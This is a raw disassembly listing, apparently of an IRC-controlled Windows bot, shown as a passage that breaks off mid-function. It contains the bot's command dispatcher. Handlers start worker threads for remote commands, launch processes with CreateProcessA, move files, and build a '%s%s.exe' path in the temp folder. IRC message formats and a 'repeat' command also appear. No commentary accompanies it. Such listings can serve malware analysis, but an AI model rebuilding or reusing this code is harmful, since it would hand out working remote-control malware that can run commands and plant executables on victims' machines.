; ---------------------------------------------------------------------------
loc_407786: ; CODE XREF: sub_401ACD+5CA1�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A974
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407797: ; CODE XREF: sub_401ACD+4E05�j
; sub_401ACD+4E1C�j
push edi
call sub_41C159
imul eax, 234h
pop ecx
cmp byte_43E928[eax], bl
jz loc_409644
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18]
call sub_41B9C0
push edi
mov esi, eax
call sub_41B9C0
push [ebp+arg_8]
add esi, eax
call sub_41B9C0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41C2E0
add esp, 14h
mov esi, eax
lea eax, [ebp+var_2C4]
push esi
push offset dword_42A968
push eax
call sub_41C266
add esp, 0Ch
cmp esi, ebx
jz loc_409644
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
push ebx
lea eax, [ebp+var_2C4]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409869
push edi
call sub_41C159
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E710[eax], 73h
jnz loc_409644
push esi
push edi
call sub_41C159
imul eax, 234h
pop ecx
add eax, offset byte_43E928
push eax
push [ebp+arg_18]
push offset aSSS ; "[%s] * %s %s"
jmp loc_407957
; ---------------------------------------------------------------------------
loc_407887: ; CODE XREF: sub_401ACD+4DD7�j
; sub_401ACD+4DEE�j
push edi
call sub_41C159
imul eax, 234h
pop ecx
cmp byte_43E928[eax], bl
jz loc_409644
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18]
call sub_41B9C0
push edi
mov esi, eax
call sub_41B9C0
push [ebp+arg_8]
add esi, eax
call sub_41B9C0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_41C2E0
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409644
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409869
push edi
call sub_41C159
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E710[eax], 73h
jnz loc_409644
push esi
push edi
call sub_41C159
imul eax, 234h
pop ecx
add eax, offset byte_43E928
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
loc_407957: ; CODE XREF: sub_401ACD+5DB5�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 28h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_407984: ; CODE XREF: sub_401ACD+4DA9�j
; sub_401ACD+4DC0�j
push edi
call dword_4CBA14 ; inet_addr
push [ebp+arg_18]
mov [ebp+var_680], eax
call sub_41C159
push [ebp+arg_0]
mov [ebp+var_690], eax
call sub_41C159
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax
call sub_41BFD0
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_2C4]
push offset unk_42A910
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40C92C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407A66
loc_407A50: ; CODE XREF: sub_401ACD+5F97�j
cmp [ebp+var_670], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407A50
; ---------------------------------------------------------------------------
loc_407A66: ; CODE XREF: sub_401ACD+5F81�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AA00
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407A77: ; CODE XREF: sub_401ACD+4D7B�j
; sub_401ACD+4D92�j
push edi
call sub_41C159
push 7Fh
mov [ebp+var_1130], eax
push [ebp+arg_18]
lea eax, [ebp+var_1234]
push eax
call sub_41BFD0
push [ebp+arg_0]
call sub_41C159
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_1134], eax
lea eax, [ebp+var_11B4]
push [ebp+var_88]
mov [ebp+var_123C], esi
push 80h
push eax
call sub_41C360
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_1120], eax
push [ebp+var_1134]
lea eax, [ebp+var_1234]
mov [ebp+var_1124], edi
push eax
push [ebp+var_1130]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42A8D4
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 18h
push eax
call sub_40B3BA
add esp, 24h
mov [ebp+var_112C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_123C]
push ebx
push eax
push offset sub_410DAB
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_112C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407B63
loc_407B4D: ; CODE XREF: sub_401ACD+6094�j
cmp [ebp+var_111C], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407B4D
; ---------------------------------------------------------------------------
loc_407B63: ; CODE XREF: sub_401ACD+607E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A890
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407B74: ; CODE XREF: sub_401ACD+4D4D�j
; sub_401ACD+4D64�j
push 0FFh
lea eax, [ebp+var_287C]
push edi
push eax
call sub_41BFD0
push 0FFh
lea eax, [ebp+var_277C]
push [ebp+arg_18]
push eax
call sub_41BFD0
push [ebp+arg_0]
mov [ebp+var_2678], ebx
call sub_41C159
mov [ebp+var_2674], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407BCD
push 10h
push ebx
push eax
call sub_41C7A5
add esp, 0Ch
mov [ebp+var_266C], eax
jmp short loc_407BD3
; ---------------------------------------------------------------------------
loc_407BCD: ; CODE XREF: sub_401ACD+60EA�j
mov [ebp+var_266C], ebx
loc_407BD3: ; CODE XREF: sub_401ACD+60FE�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_407BEA
push esi
call sub_41C159
pop ecx
mov [ebp+var_2670], eax
jmp short loc_407BF0
; ---------------------------------------------------------------------------
loc_407BEA: ; CODE XREF: sub_401ACD+610C�j
mov [ebp+var_2670], ebx
loc_407BF0: ; CODE XREF: sub_401ACD+611B�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_2668], eax
lea eax, [ebp+var_28FC]
mov [ebp+var_2900], esi
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_2660], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_2664], eax
lea eax, [ebp+var_2C4]
push edi
push offset dword_42A864
push eax
call sub_41C266
push esi
lea eax, [ebp+var_2C4]
push 1Dh
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_267C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2900]
push ebx
push eax
push offset sub_4167A0
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_267C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407CA1
loc_407C8B: ; CODE XREF: sub_401ACD+61D2�j
cmp [ebp+var_265C], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407C8B
; ---------------------------------------------------------------------------
loc_407CA1: ; CODE XREF: sub_401ACD+61BC�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A824
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407CB2: ; CODE XREF: sub_401ACD+4D1F�j
; sub_401ACD+4D36�j
push 7Fh
lea eax, [ebp+var_3494]
pop esi
push esi
push edi
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3414]
push [ebp+arg_18]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3394]
push [ebp+arg_0]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3314]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_3290], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_328C], eax
lea eax, [ebp+var_2C4]
push [ebp+arg_18]
mov [ebp+var_3498], esi
push edi
push offset unk_42A7E8
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 12h
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_3294], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3498]
push ebx
push eax
push offset sub_41561D
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3294]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407D89
loc_407D73: ; CODE XREF: sub_401ACD+62BA�j
cmp [ebp+var_3288], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407D73
; ---------------------------------------------------------------------------
loc_407D89: ; CODE XREF: sub_401ACD+62A4�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A7B0
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407D9A: ; CODE XREF: sub_401ACD+4BF2�j
; sub_401ACD+4C09�j
push 7Fh
lea eax, [ebp+var_306C]
pop esi
push esi
push edi
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_2FEC]
push [ebp+arg_18]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_2F6C]
push [ebp+arg_0]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_2EEC]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_2E68], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_2E64], eax
lea eax, [ebp+var_2C4]
push [ebp+arg_18]
mov [ebp+var_3070], esi
push edi
push offset unk_42A780
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Eh
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_2E6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3070]
push ebx
push eax
push offset sub_414358
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2E6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407E71
loc_407E5B: ; CODE XREF: sub_401ACD+63A2�j
cmp [ebp+var_2E60], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407E5B
; ---------------------------------------------------------------------------
loc_407E71: ; CODE XREF: sub_401ACD+638C�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A748
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407E82: ; CODE XREF: sub_401ACD+4AC9�j
; sub_401ACD+4AE0�j ...
push 7Fh
lea eax, [ebp+var_3CE8]
pop esi
push esi
push edi
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3C68]
push [ebp+arg_18]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3BE8]
push [ebp+arg_0]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3B68]
push [ebp+var_88]
push eax
call sub_41BFD0
push 20h
lea eax, [ebp+var_3AE8]
push [ebp+arg_8]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_3A68], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_3A64], eax
lea eax, [ebp+var_2C4]
push [ebp+arg_18]
mov [ebp+var_3CF0], esi
push edi
push offset unk_42A718
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Dh
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_3CEC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CF0]
push ebx
push eax
push offset sub_4135DF
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3CEC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407F6A
loc_407F54: ; CODE XREF: sub_401ACD+649B�j
cmp [ebp+var_3A60], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407F54
; ---------------------------------------------------------------------------
loc_407F6A: ; CODE XREF: sub_401ACD+6485�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A6E0
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407F7B: ; CODE XREF: sub_401ACD+4A9B�j
; sub_401ACD+4AB2�j
push 7Fh
lea eax, [ebp+var_177C]
push edi
push eax
call sub_41BFD0
push [ebp+arg_18]
call sub_41C159
push 3Fh
mov [ebp+var_162C], eax
push [ebp+arg_0]
lea eax, [ebp+var_16FC]
push eax
call sub_41BFD0
mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_407FC6
push 3Fh
lea eax, [ebp+var_16BC]
push esi
push eax
call sub_41BFD0
add esp, 0Ch
loc_407FC6: ; CODE XREF: sub_401ACD+64E5�j
lea eax, [ebp+var_16FC]
mov [ebp+var_1628], 1
push eax
lea eax, [ebp+var_177C]
push [ebp+var_162C]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42A6B0
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 1Fh
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_1624], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1780]
push ebx
push eax
push offset sub_4017ED
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1624]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408052
loc_40803C: ; CODE XREF: sub_401ACD+6583�j
cmp [ebp+var_1620], ebx
jnz loc_406BFE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40803C
; ---------------------------------------------------------------------------
loc_408052: ; CODE XREF: sub_401ACD+656D�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42A674
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408063: ; CODE XREF: sub_401ACD+4A5B�j
; sub_401ACD+4A72�j
push [ebp+arg_18]
call sub_41C159
cmp eax, ebx
pop ecx
mov [ebp+var_1D68], eax
jle loc_408156
mov esi, 80h
push edi
lea eax, [ebp+var_1EF0]
push esi
push eax
call sub_41C360
add esp, 0Ch
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+var_88]
setnz al
mov [ebp+var_1D64], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF4], eax
lea eax, [ebp+var_1DF0]
push esi
push eax
call sub_41C360
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1D60], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_1D5C], eax
lea eax, [ebp+var_2C4]
push edi
push offset unk_42A648
push 200h
push eax
call sub_41C360
push ebx
lea eax, [ebp+var_2C4]
push 15h
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_1D70], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF4]
push ebx
push eax
push offset sub_413A29
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1D70]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408145
loc_408133: ; CODE XREF: sub_401ACD+6676�j
cmp [ebp+var_1D58], ebx
jnz short loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408133
; ---------------------------------------------------------------------------
loc_408145: ; CODE XREF: sub_401ACD+6664�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A610
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_408156: ; CODE XREF: sub_401ACD+65A7�j
push offset unk_42A5D8
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408160: ; CODE XREF: sub_401ACD+4A2D�j
; sub_401ACD+4A44�j
push [ebp+arg_18]
push edi
call ds:dword_4270BC ; MoveFileA
test eax, eax
jz short loc_40818D
push [ebp+arg_18]
lea eax, [ebp+var_2C4]
push edi
push offset unk_42A5B4
push 200h
push eax
call sub_41C360
add esp, 14h
jmp short loc_4081AD
; ---------------------------------------------------------------------------
loc_40818D: ; CODE XREF: sub_401ACD+669F�j
push offset dword_42A5A8
call sub_418699
pop ecx
push eax
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
loc_4081AA: ; CODE XREF: sub_401ACD+548D�j
; sub_401ACD+73C5�j
add esp, 0Ch
loc_4081AD: ; CODE XREF: sub_401ACD+20DC�j
; sub_401ACD+2E89�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_4081CA: ; CODE XREF: sub_401ACD+56E4�j
call sub_409869
add esp, 14h
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_401ACD+49FF�j
; sub_401ACD+4A16�j
push edi
lea eax, [ebp+var_3F08]
push 104h
push eax
call sub_41C360
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_408211
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_408211
push eax
lea eax, [ebp+var_3E04]
push eax
call sub_41C266
pop ecx
pop ecx
loc_408211: ; CODE XREF: sub_401ACD+6722�j
; sub_401ACD+6733�j
push [ebp+var_88]
lea eax, [ebp+var_3F88]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_3F8C], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CFC], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF8], eax
lea eax, [ebp+var_3E04]
push eax
lea eax, [ebp+var_3F08]
push eax
push offset unk_42A578
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
push ebx
lea eax, [ebp+var_2C4]
push 24h
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_3D00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F8C]
push ebx
push eax
push offset sub_417054
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3D00]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4082C3
loc_4082B1: ; CODE XREF: sub_401ACD+67F4�j
cmp [ebp+var_3CF4], ebx
jnz short loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4082B1
; ---------------------------------------------------------------------------
loc_4082C3: ; CODE XREF: sub_401ACD+67E2�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A53C
loc_4082CF: ; CODE XREF: sub_401ACD+909�j
; sub_401ACD+A47�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
loc_4082DE: ; CODE XREF: sub_401ACD+7C5�j
; sub_401ACD+930�j ...
push 1
pop esi
jmp loc_406C22
; ---------------------------------------------------------------------------
loc_4082E6: ; CODE XREF: sub_401ACD+49D1�j
; sub_401ACD+49E8�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi
push ebx
push eax
call sub_41BF70
push 1
mov [ebp+var_668], esi
pop esi
mov [ebp+var_638], bx
push edi
mov [ebp+var_63C], esi
call sub_41C159
add esp, 10h
cmp eax, esi
jnz short loc_408323
mov [ebp+var_638], 5
loc_408323: ; CODE XREF: sub_401ACD+684B�j
cmp [ebp+var_C], ebx
jz loc_406BFE
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_406BFE
lea eax, [ebp+var_E34]
push eax
lea eax, [ebp+var_668]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_427074 ; CreateProcessA
test eax, eax
jnz short loc_40836E
push offset unk_42A518
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_401ACD+6895�j
push edi
push offset dword_42A4FC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408379: ; CODE XREF: sub_401ACD+49A3�j
; sub_401ACD+49BA�j
push [ebp+arg_18]
push offset aSbrti ; "sbrti"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4084F0
lea eax, [ebp+var_4BF8]
push eax
push 104h
call ds:dword_4270B8 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_25D4]
push edi
push eax
call sub_41BFD0
lea eax, [ebp+var_17D4]
push eax
call sub_40AB77
add esp, 10h
push eax
lea eax, [ebp+var_4BF8]
push eax
lea eax, [ebp+var_24D4]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_41C266
mov eax, [ebp+esi+var_84]
add esp, 10h
cmp eax, ebx
mov [ebp+var_23D0], 1
mov [ebp+var_23CC], ebx
jz short loc_40840E
push 10h
push ebx
push eax
call sub_41C7A5
add esp, 0Ch
mov [ebp+var_23C4], eax
jmp short loc_408414
; ---------------------------------------------------------------------------
loc_40840E: ; CODE XREF: sub_401ACD+692B�j
mov [ebp+var_23C4], ebx
loc_408414: ; CODE XREF: sub_401ACD+693F�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_40842B
push esi
call sub_41C159
pop ecx
mov [ebp+var_23C8], eax
jmp short loc_408431
; ---------------------------------------------------------------------------
loc_40842B: ; CODE XREF: sub_401ACD+694D�j
mov [ebp+var_23C8], ebx
loc_408431: ; CODE XREF: sub_401ACD+695C�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_88]
mov [ebp+var_23C0], eax
lea eax, [ebp+var_2654]
mov [ebp+var_2658], esi
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_23B8], eax
mov eax, [ebp+var_8]
mov [ebp+var_23BC], eax
push edi
lea eax, [ebp+var_2C4]
push offset dword_42A4C4
push eax
call sub_41C266
push esi
lea eax, [ebp+var_2C4]
push 1Eh
push eax
call sub_40B3BA
add esp, 18h
mov [ebp+var_23D4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2658]
push ebx
push eax
push offset sub_4167A0
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_23D4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4084DF
loc_4084C9: ; CODE XREF: sub_401ACD+6A10�j
cmp [ebp+var_23B4], ebx
jnz loc_406BFE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4084C9
; ---------------------------------------------------------------------------
loc_4084DF: ; CODE XREF: sub_401ACD+69FA�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42A488
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_4084F0: ; CODE XREF: sub_401ACD+68BD�j
push offset dword_42A440
loc_4084F5: ; CODE XREF: sub_401ACD+2E30�j
; sub_401ACD+447D�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_406BFE
; ---------------------------------------------------------------------------
loc_408508: ; CODE XREF: sub_401ACD+4975�j
; sub_401ACD+498C�j
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_401F75
cmp [ebp+var_C], ebx
jz loc_401F75
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
pop ecx
pop ecx
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41BFD0
push edi
call sub_41C159
add esp, 28h
test eax, eax
jle short loc_408591
push edi
call sub_41C159
imul eax, 3E8h
pop ecx
push eax
call ds:dword_427080 ; Sleep
loc_408591: ; CODE XREF: sub_401ACD+6AAE�j
push offset dword_42A41C
call sub_415D38
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_4085A5: ; CODE XREF: sub_401ACD+4947�j
; sub_401ACD+495E�j
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_401F75
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_41CA50
add esp, 10h
test eax, eax
push esi
jz short loc_408664
push [ebp+var_88]
lea eax, [ebp+var_2C4]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41BFD0
add esp, 24h
lea eax, [ebp+var_2C4]
push esi
push offset unk_42A404
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
push edi
call sub_41C159
add esp, 14h
test eax, eax
jle loc_409644
push edi
call sub_41C159
add eax, [ebp+arg_24]
pop ecx
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_408664: ; CODE XREF: sub_401ACD+6B1D�j
lea eax, [ebp+var_2C4]
push offset unk_42A3D0
push eax
call sub_41C266
add esp, 0Ch
loc_408678: ; CODE XREF: sub_401ACD+74E3�j
cmp [ebp+var_8], ebx
jnz short loc_408699
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_408699: ; CODE XREF: sub_401ACD+6BAE�j
; sub_401ACD+71C7�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
jmp loc_409643
; ---------------------------------------------------------------------------
loc_4086AA: ; CODE XREF: sub_401ACD+4919�j
; sub_401ACD+4930�j
push 7Fh
lea eax, [ebp+var_2218]
push edi
push eax
call sub_41BFD0
push 7Fh
lea eax, [ebp+var_2198]
push [ebp+arg_18]
push eax
call sub_41BFD0
push 7Fh
lea eax, [ebp+var_2118]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2094], eax
mov eax, [ebp+var_8]
mov [ebp+var_221C], esi
push [ebp+arg_18]
mov [ebp+var_2090], eax
lea eax, [ebp+var_2C4]
push edi
push offset unk_42A39C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Fh
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_2098], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_221C]
push ebx
push eax
push offset sub_414F57
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2098]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40876E
loc_408758: ; CODE XREF: sub_401ACD+6C9F�j
cmp [ebp+var_208C], ebx
jnz loc_40885A
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408758
; ---------------------------------------------------------------------------
loc_40876E: ; CODE XREF: sub_401ACD+6C89�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A360
jmp loc_40884B
; ---------------------------------------------------------------------------
loc_40877F: ; CODE XREF: sub_401ACD+48EB�j
; sub_401ACD+4902�j
push 7Fh
lea eax, [ebp+var_23AC]
push edi
push eax
call sub_41BFD0
push 7Fh
lea eax, [ebp+var_232C]
push [ebp+arg_18]
push eax
call sub_41BFD0
push 7Fh
lea eax, [ebp+var_22AC]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
mov esi, [ebp+arg_4]
add esp, 24h
mov [ebp+var_2228], eax
mov eax, [ebp+var_8]
mov [ebp+var_23B0], esi
push [ebp+arg_18]
mov [ebp+var_2224], eax
lea eax, [ebp+var_2C4]
push edi
push offset dword_42A334
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 11h
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_222C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_23B0]
push ebx
push eax
push offset sub_414703
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_222C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40883F
loc_40882D: ; CODE XREF: sub_401ACD+6D70�j
